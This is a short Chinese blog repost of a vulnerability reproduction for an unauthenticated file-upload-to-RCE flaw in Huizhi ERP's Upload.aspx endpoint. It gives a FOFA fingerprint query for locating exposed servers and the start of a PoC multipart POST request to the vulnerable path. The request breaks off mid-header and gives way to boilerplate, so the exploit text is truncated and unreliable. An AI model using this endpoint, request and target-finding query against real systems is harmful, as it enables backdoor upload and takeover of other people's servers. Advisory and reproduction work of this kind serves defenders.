本文主要是介绍汇智ERP Upload.aspx 文件上传致RCE漏洞复现,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
0x01 产品简介
汇智ERP是一款由江阴汇智软件技术有限公司开发的企业资源规划(ERP)软件,旨在通过信息化手段帮助企业优化业务流程,提升管理效率,增强综合竞争力。适用于各类企业,包括大型企业、中小型企业以及集团化企业。根据企业规模和业务需求,汇智ERP提供了不同的版本(如集团版和标准版),以满足企业的个性化需求。
0x02 漏洞概述
汇智ERP Upload.aspx 接口处任意文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。
0x03 复现环境
FOFA:icon_hash="-642591392"
0x04 漏洞复现
PoC
POST /nssys/common/Upload.aspx?Action=DNPageAjaxPostBack HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary= ----WebKitFormBoundaryLkkAXATqVKBHZ8zk
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,im
这篇关于汇智ERP Upload.aspx 文件上传致RCE漏洞复现的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!